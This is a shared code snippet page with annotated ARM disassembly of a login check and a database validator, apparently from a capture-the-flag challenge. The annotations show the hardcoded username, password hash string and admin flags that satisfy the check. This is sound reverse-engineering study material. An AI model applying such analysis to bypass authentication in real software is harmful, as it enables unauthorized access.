Skip to content

Instantly share code, notes, and snippets.

@ebeip90

ebeip90/check_login.asm Secret

Created September 21, 2014 06:38
Download ZIP
Raw
check_login.asm
__text:00000C30 ; =============== S U B R O U T I N E =======================================
__text:00000C30
__text:00000C30
__text:00000C30 EXPORT _check_login
__text:00000C30 _check_login
__text:00000C30
__text:00000C30 STACKARG0 = -0x6C
__text:00000C30 var_68 = -0x68
__text:00000C30 var_64 = -0x64
__text:00000C30 var_60 = -0x60
__text:00000C30 var_5C = -0x5C
__text:00000C30 var_58 = -0x58
__text:00000C30 var_54 = -0x54
__text:00000C30 var_50 = -0x50
__text:00000C30 COLUMN_ID = -0x4C
__text:00000C30 FOUND_ISAWESOME = -0x48
__text:00000C30 FOUND_ADMIN = -0x44
__text:00000C30 FOUND_PASSWORD = -0x40
__text:00000C30 FOUND_CAPTAINFALCON = -0x3C
__text:00000C30 pCURRENT_ROWCOL_ = -0x38
__text:00000C30 END_OF_DATA = -0x34
__text:00000C30 COLUMNSIZE = -0x30
__text:00000C30 COLUMN_IDX = -0x2C
__text:00000C30 pCURRENT_ROWCOL = -0x28
__text:00000C30 COLUMNSIZE_CUMULATIVE = -0x24
__text:00000C30 pROW_DATA = -0x20
__text:00000C30 pCOLUMN_DATA = -0x1C
__text:00000C30 arg_0 = -0x18
__text:00000C30 TOTAL_DATA_SIZE??? = -0x14
__text:00000C30 pDATABASE = -0x10
__text:00000C30 var_C = -0xC
__text:00000C30
__text:00000C30 PUSH {R7,LR}
__text:00000C32 MOV R7, SP
__text:00000C34 SUB SP, SP, #0x64
; Initialize & Save
__text:00000C36 MOVS R2, #0
__text:00000C3C STR R0, [SP,#0x6C+pDATABASE]
__text:00000C3E STR R1, [SP,#0x6C+TOTAL_DATA_SIZE???]
__text:00000C40 LDR R0, [SP,#0x6C+pDATABASE]
__text:00000C42 STR R0, [SP,#0x6C+arg_0]
; pCOLUMNS = DATABASE + sizeof COLUMNHEADER
__text:00000C44 LDR R0, [SP,#0x6C+pDATABASE]
__text:00000C46 ADDS R0, #0xC ;; arg0 + C
__text:00000C48 STR R0, [SP,#0x6C+pCOLUMN_DATA]
; pROWS = DATABASE + sizeof COLUMNHEADER + (DATABASE->COLUMNS * sizeof COLUMN)
; (arg0+C + [arg0+8]*17)
__text:00000C4A LDR R0, [SP,#0x6C+pDATABASE]
__text:00000C4C ADDS R0, #0xC
__text:00000C4E STR R0, [SP,#0x6C+pROW_DATA]
__text:00000C50 LDR R0, [SP,#0x6C+arg_0]
__text:00000C52 LDRH R0, [R0,#8] ; [r0+8]
__text:00000C54 MOVS R1, #0x11 ; 17
__text:00000C5A MULS R0, R1 ; (arg0+8)*17
__text:00000C5C LDR R1, [SP,#0x6C+pROW_DATA] ; arg0+C
__text:00000C5E ADD R0, R1 ;
__text:00000C60 STR R0, [SP,#0x6C+pROW_DATA]
__text:00000C62 STR R2, [SP,#0x6C+COLUMNSIZE_CUMULATIVE]
__text:00000C64 LDR R0, [SP,#0x6C+pDATABASE]
__text:00000C66 ADDS R0, #0xC
__text:00000C68 STR R0, [SP,#0x6C+pCURRENT_ROWCOL]
__text:00000C6A STR R2, [SP,#0x6C+COLUMN_IDX]
;========> LOOP
__text:00000C6C
__text:00000C6C loc_C6C ; CODE XREF: _check_login+72j
; if COLUMN_IDX > DATABASE.NUM_COLUMNS
; break
__text:00000C6C LDR R0, [SP,#0x6C+COLUMN_IDX]
__text:00000C6E LDR R1, [SP,#0x6C+arg_0]
__text:00000C70 LDRH R1, [R1,#8]
__text:00000C72 CMP R0, R1
__text:00000C74 BCS loc_CA4
; GET COLUMN SIZE
__text:00000C76 LDR R0, [SP,#0x6C+pCURRENT_ROWCOL]
__text:00000C78 BL _col_size4
__text:00000C7C STR R0, [SP,#0x6C+COLUMNSIZE]
; IF COLUMN_SIZE == 0: EXIT
__text:00000C7E LDR R0, [SP,#0x6C+COLUMNSIZE]
__text:00000C80 CMP R0, #0
__text:00000C82 BNE loc_C8E
__text:00000C84 MOVS R0, #0
__text:00000C8A STR R0, [SP,#0x6C+var_C]
__text:00000C8C B loc_EXIT
__text:00000C8E loc_C8E ; CODE XREF: _check_login+52j
__text:00000C8E LDR R0, [SP,#0x6C+COLUMNSIZE]
__text:00000C90 LDR R1, [SP,#0x6C+COLUMNSIZE_CUMULATIVE]
__text:00000C92 ADD R0, R1
__text:00000C94 STR R0, [SP,#0x6C+COLUMNSIZE_CUMULATIVE]
__text:00000C96 LDR R0, [SP,#0x6C+pCURRENT_ROWCOL]
__text:00000C98 ADDS R0, #0x11
__text:00000C9A STR R0, [SP,#0x6C+pCURRENT_ROWCOL]
__text:00000C9C LDR R0, [SP,#0x6C+COLUMN_IDX]
__text:00000C9E ADDS R0, #1
__text:00000CA0 STR R0, [SP,#0x6C+COLUMN_IDX]
__text:00000CA2 B loc_C6C
;<======== LOOP
; END_OF_DATA = pDATABASE + TOTAL_DATA_SIZE
__text:00000CA4 loc_CA4 ; CODE XREF: _check_login+44j
__text:00000CA4 LDR R0, [SP,#0x6C+pROW_DATA]
__text:00000CA6 STR R0, [SP,#0x6C+pCURRENT_ROWCOL]
__text:00000CA8 LDR R0, [SP,#0x6C+pDATABASE]
__text:00000CAA LDR R1, [SP,#0x6C+TOTAL_DATA_SIZE???]
__text:00000CAC ADD R0, R1
__text:00000CAE STR R0, [SP,#0x6C+END_OF_DATA]
__text:00000CB0
; if pCURRENT_ROWCOL > END_OF_DATA: EXIT
__text:00000CB0 loc_CB0 ; CODE XREF: _check_login+2E2j
__text:00000CB0 LDR R0, [SP,#0x6C+pCURRENT_ROWCOL]
__text:00000CB2 LDR R1, [SP,#0x6C+END_OF_DATA]
__text:00000CB4 CMP R0, R1
__text:00000CB6 BCS.W loc_EXIT2
__text:00000CBA MOVS R0, #0
__text:00000CC0 LDR R1, [SP,#0x6C+pCURRENT_ROWCOL]
__text:00000CC2 STR R1, [SP,#0x6C+pCURRENT_ROWCOL_]
__text:00000CC4 STR R0, [SP,#0x6C+FOUND_CAPTAINFALCON]
__text:00000CC6 STR R0, [SP,#0x6C+FOUND_PASSWORD]
__text:00000CC8 STR R0, [SP,#0x6C+FOUND_ADMIN]
__text:00000CCA STR R0, [SP,#0x6C+FOUND_ISAWESOME]
__text:00000CCC STR R0, [SP,#0x6C+COLUMN_ID]
__text:00000CCE
; if COLUMN_ID > DATABASE.NUM_COLUMNS
__text:00000CCE loc_CCE ; CODE XREF: _check_login+296j
__text:00000CCE LDR R0, [SP,#0x6C+COLUMN_ID]
__text:00000CD0 LDR R1, [SP,#0x6C+arg_0]
__text:00000CD2 LDRH R1, [R1,#8]
__text:00000CD4 CMP R0, R1
__text:00000CD6 BCS.W log_USERNAMEPASS
; r2 = 8 (strlen 'USERNAME')
; r1 = 'USERNAME'
; r0 = pCOLUMN_DATA[COLUMN_ID].String
; STRCMP
__text:00000CDA MOV R1, #(aUsername - 0xCE6) ; "USERNAME"
__text:00000CE2 ADD R1, PC ; "USERNAME"
__text:00000CE4 MOVS R2, #8 ; size_t
__text:00000CEA LDR R0, [SP,#0x6C+COLUMN_ID]
__text:00000CEC LDR R3, [SP,#0x6C+pCOLUMN_DATA]
__text:00000CEE MOV R9, #0x11
__text:00000CF6 MUL.W R0, R0, R9
__text:00000CFA ADD R0, R3
__text:00000CFC ADDS R0, #1 ; char *
__text:00000CFE BLX _strncmp
__text:00000D02 CMP R0, #0
__text:00000D04 BNE loc_D3E
; Type of column == 5??
__text:00000D06 LDR R0, [SP,#0x6C+COLUMN_ID]
__text:00000D08 LDR R1, [SP,#0x6C+pCOLUMN_DATA]
__text:00000D0A MOVS R2, #0x11
__text:00000D10 MULS R0, R2
__text:00000D12 ADD R0, R1
__text:00000D14 LDRB R0, [R0]
__text:00000D16 CMP R0, #5
__text:00000D18 BNE loc_D3E
; strcmp("captainfalcon", pCOLUMN_DATA[COLUMN_ID],String)
__text:00000D1A MOV R1, #(aCaptainfalcon - 0xD26) ; "captainfalcon"
__text:00000D22 ADD R1, PC ; "captainfalcon"
__text:00000D24 MOVS R2, #0xE ; size_t
__text:00000D2A LDR R0, [SP,#0x6C+pCURRENT_ROWCOL_] ; char *
__text:00000D2C BLX _strncmp
__text:00000D30 CMP R0, #0
__text:00000D32 BNE loc_D3C
__text:00000D34 MOVS R0, #1
__text:00000D3A STR R0, [SP,#0x6C+FOUND_CAPTAINFALCON]
__text:00000D3C
__text:00000D3C loc_D3C ; CODE XREF: _check_login+102j
__text:00000D3C B loc_D3E
; If column is 'PASSWORD'
__text:00000D3E loc_D3E ; CODE XREF: _check_login+D4j
__text:00000D3E ; _check_login+E8j ...
__text:00000D3E MOV R1, #(aPassword - 0xD4A) ; "PASSWORD"
__text:00000D46 ADD R1, PC ; "PASSWORD"
__text:00000D48 MOVS R2, #8 ; size_t
__text:00000D4E LDR R0, [SP,#0x6C+COLUMN_ID]
__text:00000D50 LDR R3, [SP,#0x6C+pCOLUMN_DATA]
__text:00000D52 MOV R9, #0x11
__text:00000D5A MUL.W R0, R0, R9
__text:00000D5E ADD R0, R3
__text:00000D60 ADDS R0, #1 ; char *
__text:00000D62 BLX _strncmp
__text:00000D66 CMP R0, #0
__text:00000D68 BNE loc_DA2
; Type of column == 6??
__text:00000D6A LDR R0, [SP,#0x6C+COLUMN_ID]
__text:00000D6C LDR R1, [SP,#0x6C+pCOLUMN_DATA]
__text:00000D6E MOVS R2, #0x11
__text:00000D74 MULS R0, R2
__text:00000D76 ADD R0, R1
__text:00000D78 LDRB R0, [R0]
__text:00000D7A CMP R0, #6
__text:00000D7C BNE loc_DA2
; strcmp('fc03329505475dd4be51627cc7f0b1f1', pCURRENT_ROWCOL_)
__text:00000D7E MOV R1, #(aFc03329505475d - 0xD8A) ; "fc03329505475dd4be51627cc7f0b1f1"
__text:00000D86 ADD R1, PC ; "fc03329505475dd4be51627cc7f0b1f1"
__text:00000D88 MOVS R2, #0x20 ; ' ' ; size_t
__text:00000D8E LDR R0, [SP,#0x6C+pCURRENT_ROWCOL_] ; char *
__text:00000D90 BLX _strncmp
__text:00000D94 CMP R0, #0
__text:00000D96 BNE loc_DA0
__text:00000D98 MOVS R0, #1
__text:00000D9E STR R0, [SP,#0x6C+FOUND_PASSWORD]
__text:00000DA0
__text:00000DA0 loc_DA0 ; CODE XREF: _check_login+166j
__text:00000DA0 B loc_DA2
; column is "ADMIN"
__text:00000DA2 loc_DA2 ; CODE XREF: _check_login+138j
__text:00000DA2 ; _check_login+14Cj ...
__text:00000DA2 MOV R1, #(aAdmin - 0xDAE) ; "ADMIN"
__text:00000DAA ADD R1, PC ; "ADMIN"
__text:00000DAC MOVS R2, #5 ; size_t
__text:00000DB2 LDR R0, [SP,#0x6C+COLUMN_ID]
__text:00000DB4 LDR R3, [SP,#0x6C+pCOLUMN_DATA]
__text:00000DB6 MOV R9, #0x11
__text:00000DBE MUL.W R0, R0, R9
__text:00000DC2 ADD R0, R3
__text:00000DC4 ADDS R0, #1 ; char *
__text:00000DC6 BLX _strncmp
__text:00000DCA CMP R0, #0
__text:00000DCC BNE loc_E0C
; column type == 0
__text:00000DCE LDR R0, [SP,#0x6C+COLUMN_ID]
__text:00000DD0 LDR R1, [SP,#0x6C+pCOLUMN_DATA]
__text:00000DD2 MOVS R2, #0x11
__text:00000DD8 MULS R0, R2
__text:00000DDA ADD R0, R1
__text:00000DDC LDRB R0, [R0]
__text:00000DDE CMP R0, #0
__text:00000DE0 BNE loc_E0C
; admin row is uint8==1
__text:00000DE2 LDR R0, [SP,#0x6C+pCURRENT_ROWCOL_]
__text:00000DE4 LDRB R0, [R0]
__text:00000DE6 STRB.W R0, [SP,#0x6C+var_50]
__text:00000DEA LDRB.W R0, [SP,#0x6C+var_50]
__text:00000DEE CMP R0, #1
__text:00000DF0 BNE loc_DFA
__text:00000DF2 MOVS R0, #1
__text:00000DF8 STR R0, [SP,#0x6C+FOUND_ADMINs]
__text:00000DFA
; printf("%u", ADMIN)
__text:00000DFA loc_DFA ; CODE XREF: _check_login+1C0j
__text:00000DFA MOV R0, #(aU - 0xE06) ; "%u\n"
__text:00000E02 ADD R0, PC ; "%u\n"
__text:00000E04 LDR R1, [SP,#0x6C+FOUND_ADMIN]
__text:00000E06 BLX _printf
__text:00000E0A STR R0, [SP,#0x6C+var_58]
__text:00000E0C
; Next column is ISAWESOME
__text:00000E0C loc_E0C ; CODE XREF: _check_login+19Cj
__text:00000E0C ; _check_login+1B0j
__text:00000E0C MOV R1, #(aIsawesome - 0xE18) ; "ISAWESOME"
__text:00000E14 ADD R1, PC ; "ISAWESOME"
__text:00000E16 MOVS R2, #9 ; size_t
__text:00000E1C LDR R0, [SP,#0x6C+COLUMN_ID]
__text:00000E1E LDR R3, [SP,#0x6C+pCOLUMN_DATA]
__text:00000E20 MOV R9, #0x11
__text:00000E28 MUL.W R0, R0, R9
__text:00000E2C ADD R0, R3
__text:00000E2E ADDS R0, #1 ; char *
__text:00000E30 BLX _strncmp
__text:00000E34 CMP R0, #0
__text:00000E36 BNE loc_E68
; Field type is uint8
__text:00000E38 LDR R0, [SP,#0x6C+COLUMN_ID]
__text:00000E3A LDR R1, [SP,#0x6C+pCOLUMN_DATA]
__text:00000E3C MOVS R2, #0x11
__text:00000E42 MULS R0, R2
__text:00000E44 ADD R0, R1
__text:00000E46 LDRB R0, [R0]
__text:00000E48 CMP R0, #0
__text:00000E4A BNE loc_E68
; Value is 1
__text:00000E4C LDR R0, [SP,#0x6C+pCURRENT_ROWCOL_]
__text:00000E4E LDRB R0, [R0]
__text:00000E50 STRB.W R0, [SP,#0x6C+var_54]
__text:00000E54 LDRB.W R0, [SP,#0x6C+var_54]
__text:00000E58 CMP R0, #1
__text:00000E5A MOVW R0, #0
__text:00000E5E IT EQ
__text:00000E60 MOVEQ R0, #1
__text:00000E62 AND.W R0, R0, #1
__text:00000E66 STR R0, [SP,#0x6C+FOUND_ISAWESOME]
__text:00000E68
__text:00000E68 loc_E68 ; CODE XREF: _check_login+206j
__text:00000E68 ; _check_login+21Aj
__text:00000E68 LDR R0, [SP,#0x6C+COLUMN_ID]
__text:00000E6A LDR R1, [SP,#0x6C+pCOLUMN_DATA]
__text:00000E6C MOVS R2, #0x11
__text:00000E72 MULS R0, R2
__text:00000E74 ADD R0, R1
__text:00000E76 ADDS R1, R0, #1
__text:00000E78 LDR R0, [SP,#0x6C+COLUMN_ID]
__text:00000E7A LDR R2, [SP,#0x6C+pCOLUMN_DATA]
__text:00000E7C MOVS R3, #0x11
__text:00000E82 MULS R0, R3
__text:00000E84 ADD R0, R2
__text:00000E86 STR R1, [SP,#0x6C+var_5C]
__text:00000E88 BL _col_size
__text:00000E8C MOV R1, #(a_16sUP - 0xE98) ; "%.16s %u\t%p\n"
__text:00000E94 ADD R1, PC ; "%.16s %u\t%p\n"
__text:00000E96 LDR R3, [SP,#0x6C+pCURRENT_ROWCOL_]
__text:00000E98 STR R0, [SP,#0x6C+var_60]
__text:00000E9A MOV R0, R1 ; char *
__text:00000E9C LDR R1, [SP,#0x6C+var_5C]
__text:00000E9E LDR R2, [SP,#0x6C+var_60]
__text:00000EA0 BLX _printf
__text:00000EA4 LDR R1, [SP,#0x6C+COLUMN_ID]
__text:00000EA6 LDR R2, [SP,#0x6C+pCOLUMN_DATA]
__text:00000EA8 MOVS R3, #0x11
__text:00000EAE MULS R1, R3
__text:00000EB0 ADD R1, R2
__text:00000EB2 STR R0, [SP,#0x6C+var_64]
__text:00000EB4 MOV R0, R1
__text:00000EB6 BL _col_size
__text:00000EBA LDR R1, [SP,#0x6C+pCURRENT_ROWCOL_]
__text:00000EBC ADD R0, R1
__text:00000EBE STR R0, [SP,#0x6C+pCURRENT_ROWCOL_]
__text:00000EC0 LDR R0, [SP,#0x6C+COLUMN_ID]
__text:00000EC2 ADDS R0, #1
__text:00000EC4 STR R0, [SP,#0x6C+COLUMN_ID]
__text:00000EC6 B loc_CCE
; Executed after all columns inspected
__text:00000EC8 log_USERNAMEPASS ; CODE XREF: _check_login+A6j
__text:00000EC8 MOV R0, #(aUsernameUPassw - 0xED4) ; "username: %u\tpassword: %u\tadmin: %u\t"...
__text:00000ED0 ADD R0, PC ; "username: %u\tpassword: %u\tadmin: %u\t"...
__text:00000ED2 LDR R1, [SP,#0x6C+FOUND_CAPTAINFALCON]
__text:00000ED4 LDR R2, [SP,#0x6C+FOUND_PASSWORD]
__text:00000ED6 LDR R3, [SP,#0x6C+FOUND_ADMIN]
__text:00000ED8 LDR.W R9, [SP,#0x6C+FOUND_ISAWESOME]
__text:00000EDC STR.W R9, [SP,#0x6C+STACKARG0]
__text:00000EE0 BLX _printf
__text:00000EE4 LDR R1, [SP,#0x6C+FOUND_CAPTAINFALCON]
__text:00000EE6 CMP R1, #0
__text:00000EE8 STR R0, [SP,#0x6C+var_68]
__text:00000EEA BEQ loc_F08
__text:00000EEC LDR R0, [SP,#0x6C+FOUND_PASSWORD]
__text:00000EEE CMP R0, #0
__text:00000EF0 BEQ loc_F08
__text:00000EF2 LDR R0, [SP,#0x6C+FOUND_ADMIN]
__text:00000EF4 CMP R0, #0
__text:00000EF6 BEQ loc_F08
__text:00000EF8 LDR R0, [SP,#0x6C+FOUND_ISAWESOME]
__text:00000EFA CMP R0, #0
__text:00000EFC BEQ loc_F08
__text:00000EFE MOVS R0, #1
__text:00000F04 STR R0, [SP,#0x6C+var_C]
__text:00000F06 B loc_EXIT
__text:00000F08 loc_F08 ; CODE XREF: _check_login+2BAj
__text:00000F08 ; _check_login+2C0j ...
__text:00000F08 B loc_F0A
__text:00000F0A loc_F0A ; CODE XREF: _check_login:loc_F08j
__text:00000F0A LDR R0, [SP,#0x6C+COLUMNSIZE_CUMULATIVE]
__text:00000F0C LDR R1, [SP,#0x6C+pCURRENT_ROWCOL]
__text:00000F0E ADD R0, R1
__text:00000F10 STR R0, [SP,#0x6C+pCURRENT_ROWCOL]
__text:00000F12 B loc_CB0
__text:00000F14 loc_EXIT2 ; CODE XREF: _check_login+86j
__text:00000F14 MOVS R0, #0
__text:00000F1A STR R0, [SP,#0x6C+var_C]
__text:00000F1C
__text:00000F1C loc_EXIT ; CODE XREF: _check_login+5Cj
__text:00000F1C ; _check_login+2D6j
__text:00000F1C LDR R0, [SP,#0x6C+var_C]
__text:00000F1E ADD SP, SP, #0x64
__text:00000F20 POP {R7,PC}
__text:00000F20 ; End of function _check_login
__text:00000F20
__text:00000F20 ; __text ends
__text:00000F20
Raw
col_size.asm
Retrives thesize of a column.
/*
* Column types:
* * 0 = 8bit integer
* * 1 = 16bit integer
* * 2 = 32bit integer
* * 3 = 64bit integer
* * 4 = 8byte string
* * 5 = 16byte string
* * 6 = 32byte string
* * 7 = unix timestamp encoded as a 32bit integer
*
*/
__text:00000A80 ; =============== S U B R O U T I N E =======================================
__text:00000A80
__text:00000A80
__text:00000A80 EXPORT _col_size
__text:00000A80 _col_size ; CODE XREF: _validate_database+DEp
__text:00000A80 ; _check_login+48p ...
__text:00000A80
__text:00000A80 var_C = -0xC
__text:00000A80 var_8 = -8
__text:00000A80 var_4 = -4
__text:00000A80
__text:00000A80 SUB SP, SP, #0xC
__text:00000A82 STR R0, [SP,#0xC+var_8]
__text:00000A84 LDRB R0, [R0]
__text:00000A86 CMP R0, #7
__text:00000A88 STR R0, [SP,#0xC+var_C]
__text:00000A8A BHI loc_AEA
__text:00000A8C LDR R1, [SP,#0xC+var_C]
__text:00000A8E TBB.W [PC,R1] ; switch 8 cases
__text:00000A8E ; ---------------------------------------------------------------------------
__text:00000A92 jpt_A8E DCB 4 ; jump table for switch statement
__text:00000A93 DCB 9
__text:00000A94 DCB 0xE
__text:00000A95 DCB 0x13
__text:00000A96 DCB 0x18
__text:00000A97 DCB 0x1D
__text:00000A98 DCB 0x22
__text:00000A99 DCB 0x27
__text:00000A9A ; ---------------------------------------------------------------------------
__text:00000A9A
__text:00000A9A loc_A9A ; CODE XREF: _col_size+Ej
__text:00000A9A MOVS R0, #1 ; jumptable 00000A8E case 0
__text:00000AA0 STR R0, [SP,#0xC+var_4]
__text:00000AA2 B loc_AF2
__text:00000AA4 ; ---------------------------------------------------------------------------
__text:00000AA4
__text:00000AA4 loc_AA4 ; CODE XREF: _col_size+Ej
__text:00000AA4 MOVS R0, #2 ; jumptable 00000A8E case 1
__text:00000AAA STR R0, [SP,#0xC+var_4]
__text:00000AAC B loc_AF2
__text:00000AAE ; ---------------------------------------------------------------------------
__text:00000AAE
__text:00000AAE loc_AAE ; CODE XREF: _col_size+Ej
__text:00000AAE MOVS R0, #4 ; jumptable 00000A8E case 2
__text:00000AB4 STR R0, [SP,#0xC+var_4]
__text:00000AB6 B loc_AF2
__text:00000AB8 ; ---------------------------------------------------------------------------
__text:00000AB8
__text:00000AB8 loc_AB8 ; CODE XREF: _col_size+Ej
__text:00000AB8 MOVS R0, #8 ; jumptable 00000A8E case 3
__text:00000ABE STR R0, [SP,#0xC+var_4]
__text:00000AC0 B loc_AF2
__text:00000AC2 ; ---------------------------------------------------------------------------
__text:00000AC2
__text:00000AC2 loc_AC2 ; CODE XREF: _col_size+Ej
__text:00000AC2 MOVS R0, #8 ; jumptable 00000A8E case 4
__text:00000AC8 STR R0, [SP,#0xC+var_4]
__text:00000ACA B loc_AF2
__text:00000ACC ; ---------------------------------------------------------------------------
__text:00000ACC
__text:00000ACC loc_ACC ; CODE XREF: _col_size+Ej
__text:00000ACC MOVS R0, #0x10 ; jumptable 00000A8E case 5
__text:00000AD2 STR R0, [SP,#0xC+var_4]
__text:00000AD4 B loc_AF2
__text:00000AD6 ; ---------------------------------------------------------------------------
__text:00000AD6
__text:00000AD6 loc_AD6 ; CODE XREF: _col_size+Ej
__text:00000AD6 MOVS R0, #0x20 ; ' ' ; jumptable 00000A8E case 6
__text:00000ADC STR R0, [SP,#0xC+var_4]
__text:00000ADE B loc_AF2
__text:00000AE0 ; ---------------------------------------------------------------------------
__text:00000AE0
__text:00000AE0 loc_AE0 ; CODE XREF: _col_size+Ej
__text:00000AE0 MOVS R0, #4 ; jumptable 00000A8E case 7
__text:00000AE6 STR R0, [SP,#0xC+var_4]
__text:00000AE8 B loc_AF2
__text:00000AEA ; ---------------------------------------------------------------------------
__text:00000AEA
__text:00000AEA loc_AEA ; CODE XREF: _col_size+Aj
__text:00000AEA MOVS R0, #0
__text:00000AF0 STR R0, [SP,#0xC+var_4]
__text:00000AF2
__text:00000AF2 loc_AF2 ; CODE XREF: _col_size+22j
__text:00000AF2 ; _col_size+2Cj ...
__text:00000AF2 LDR R0, [SP,#0xC+var_4]
__text:00000AF4 ADD SP, SP, #0xC
__text:00000AF6 BX LR
__text:00000AF6 ; End of function _col_size
__text:00000AF6
__text:00000AF8
Raw
validate_database.asm
__text:00000AF8 ; =============== S U B R O U T I N E =======================================
__text:00000AF8
__text:00000AF8
__text:00000AF8 EXPORT _validate_database
__text:00000AF8 _validate_database
__text:00000AF8
__text:00000AF8 COLUMN_SIZE = -0x2C
__text:00000AF8 COLUMN_NUMBER = -0x28
__text:00000AF8 COLUMN_DATA = -0x24
__text:00000AF8 COLUMNSIZE_CUMULATIVE = -0x20
__text:00000AF8 TOTAL_BYTES = -0x1C
__text:00000AF8 P_DATABASE = -0x18
__text:00000AF8 ARG1_BUFFERSIZE = -0x14
__text:00000AF8 SAVED_ARG0 = -0x10
__text:00000AF8 var_C = -0xC
__text:00000AF8
__text:00000AF8 PUSH {R7,LR}
__text:00000AFA MOV R7, SP
__text:00000AFC SUB SP, SP, #0x24
__text:00000AFE MOVS R2, #0xC
__text:00000B04 STR R0, [SP,#0x2C+SAVED_ARG0]
__text:00000B06 STR R1, [SP,#0x2C+ARG1_BUFFERSIZE]
__text:00000B08 LDR R0, [SP,#0x2C+SAVED_ARG0]
__text:00000B0A STR R0, [SP,#0x2C+P_DATABASE]
__text:00000B0C STR R2, [SP,#0x2C+TOTAL_BYTES]
__text:00000B0E LDR R0, [SP,#0x2C+ARG1_BUFFERSIZE]
__text:00000B10 LDR R1, [SP,#0x2C+TOTAL_BYTES]
BUFFERSIZE < SIZEOF COLUMN?
OR EXIT
__text:00000B12 CMP R0, R1
__text:00000B14 BCS loc_B20
__text:00000B16 MOVS R0, #0
__text:00000B1C STR R0, [SP,#0x2C+var_C]
__text:00000B1E B loc_EXIT
MAGIC
WORD [database] == 'WOLO'
OR EXIT
__text:00000B20 loc_B20 ; CODE XREF: _validate_database+1Cj
__text:00000B20 MOV R0, #0x4F4C4F57 ; WOLO
__text:00000B28 LDR R1, [SP,#0x2C+P_DATABASE]
__text:00000B2A LDR R1, [R1]
__text:00000B2C CMP R1, R0
__text:00000B2E BEQ loc_B3A
__text:00000B30 MOVS R0, #0
__text:00000B36 STR R0, [SP,#0x2C+var_C]
__text:00000B38 B loc_EXIT
VERSION
WORD [database+4] == 1?
OR EXIT
__text:00000B3A loc_B3A ; CODE XREF: _validate_database+36j
__text:00000B3A LDR R0, [SP,#0x2C+P_DATABASE]
__text:00000B3C LDR R0, [R0,#4]
__text:00000B3E CMP R0, #1
__text:00000B40 BEQ loc_B4C
__text:00000B42 MOVS R0, #0
__text:00000B48 STR R0, [SP,#0x2C+var_C]
__text:00000B4A B loc_EXIT
ROWS
USHORT [database+0xA] >= 4
OR EXIT
__text:00000B4C loc_B4C ; CODE XREF: _validate_database+48j
__text:00000B4C LDR R0, [SP,#0x2C+P_DATABASE]
__text:00000B4E LDRH R0, [R0,#0xA]
__text:00000B50 CMP R0, #4
__text:00000B52 BGE loc_B5E
__text:00000B54 MOVS R0, #0
__text:00000B5A STR R0, [SP,#0x2C+var_C]
__text:00000B5C B loc_EXIT
ROWS
USHORT [database+0xA] <= 0x1000
OR EXIT
__text:00000B5E loc_B5E ; CODE XREF: _validate_database+5Aj
__text:00000B5E LDR R0, [SP,#0x2C+P_DATABASE]
__text:00000B60 LDRH R0, [R0,#0xA]
__text:00000B62 CMP.W R0, #0x1000
__text:00000B66 BLE loc_B72
__text:00000B68 MOVS R0, #0
__text:00000B6E STR R0, [SP,#0x2C+var_C]
__text:00000B70 B loc_EXIT
COLUMNS
USHORT [database+8] > 4
OR EXIT
__text:00000B72 loc_B72 ; CODE XREF: _validate_database+6Ej
__text:00000B72 LDR R0, [SP,#0x2C+P_DATABASE]
__text:00000B74 LDRH R0, [R0,#8]
__text:00000B76 CMP R0, #4
__text:00000B78 BGE loc_B84
__text:00000B7A MOVS R0, #0
__text:00000B80 STR R0, [SP,#0x2C+var_C]
__text:00000B82 B loc_EXIT
COLUMNS
USHORT [database+8] <= 0x10
__text:00000B84 loc_B84 ; CODE XREF: _validate_database+80j
__text:00000B84 LDR R0, [SP,#0x2C+P_DATABASE]
__text:00000B86 LDRH R0, [R0,#8]
__text:00000B88 CMP R0, #0x10
__text:00000B8A BLE loc_B96
__text:00000B8C MOVS R0, #0
__text:00000B92 STR R0, [SP,#0x2C+var_C]
__text:00000B94 B loc_EXIT
COLUMNS
R0 = database.columns * sizeof(column)
__text:00000B96 loc_B96 ; CODE XREF: _validate_database+92j
__text:00000B96 LDR R0, [SP,#0x2C+P_DATABASE]
__text:00000B98 LDRH R0, [R0,#8]
__text:00000B9A MOVS R1, #0x11 ; SIZEOF COLUMN
__text:00000BA0 MULS R0, R1
R0 = (total column bytes) + ARG2
__text:00000BA2 LDR R1, [SP,#0x2C+TOTAL_BYTES]
__text:00000BA4 ADD R0, R1
if sizeof COLUMN_HEADER + COLUMN_BYTES > BUFFERSIZE
EXIT
__text:00000BA6 STR R0, [SP,#0x2C+TOTAL_BYTES]
__text:00000BA8 LDR R0, [SP,#0x2C+ARG1_BUFFERSIZE]
__text:00000BAA LDR R1, [SP,#0x2C+TOTAL_BYTES]
__text:00000BAC CMP R0, R1
__text:00000BAE BCS loc_BBA
__text:00000BB0 MOVS R0, #0
__text:00000BB6 STR R0, [SP,#0x2C+var_C]
__text:00000BB8 B loc_EXIT
R0 = 0
R1 = ARG0 ; database
R1 = database.column_data
__text:00000BBA loc_BBA ; CODE XREF: _validate_database+B6j
__text:00000BBA MOVS R0, #0
__text:00000BC0 STR R0, [SP,#0x2C+COLUMNSIZE_CUMULATIVE]
__text:00000BC2 LDR R1, [SP,#0x2C+SAVED_ARG0]
__text:00000BC4 ADDS R1, #0xC
__text:00000BC6 STR R1, [SP,#0x2C+COLUMN_DATA]
__text:00000BC8 STR R0, [SP,#0x2C+COLUMN_NUMBER]
__text:00000BCA
; ------ LOOOOOP
if COLUMN_NUMBER > NUM_COLUMNS:
break
__text:00000BCA loc_BCA ; CODE XREF: _validate_database+108j
__text:00000BCA LDR R0, [SP,#0x2C+COLUMN_NUMBER]
__text:00000BCC LDR R1, [SP,#0x2C+P_DATABASE]
__text:00000BCE LDRH R1, [R1,#8]
__text:00000BD0 CMP R0, R1
__text:00000BD2 BCS loc_C02
if COLUMN_SIZE(COLUMN) == 0
EXIT
__text:00000BD4 LDR R0, [SP,#0x2C+COLUMN_DATA]
__text:00000BD6 BL _col_size
__text:00000BDA STR R0, [SP,#0x2C+COLUMN_SIZE]
__text:00000BDC LDR R0, [SP,#0x2C+COLUMN_SIZE]
__text:00000BDE CMP R0, #0
__text:00000BE0 BNE loc_BEC
__text:00000BE2 MOVS R0, #0
__text:00000BE8 STR R0, [SP,#0x2C+var_C]
__text:00000BEA B loc_EXIT
COLUMNSIZE_CUMULATIVE += COLUMN_SIZE
__text:00000BEC loc_BEC ; CODE XREF: _validate_database+E8j
__text:00000BEC LDR R0, [SP,#0x2C+COLUMN_SIZE]
__text:00000BEE LDR R1, [SP,#0x2C+COLUMNSIZE_CUMULATIVE]
__text:00000BF0 ADD R0, R1
__text:00000BF2 STR R0, [SP,#0x2C+COLUMNSIZE_CUMULATIVE]
pCOLUMN_DATA += sizeof COLUMN
